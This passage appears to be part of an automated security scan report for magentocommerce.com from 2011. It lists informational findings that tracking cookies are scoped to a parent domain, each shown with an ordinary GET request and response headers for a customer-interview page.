Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.60. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.61. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.62. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.63. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.64. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.65. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.66. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.67. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.68. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.69. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.70. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.71. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.72. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.73. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.74. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.75. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

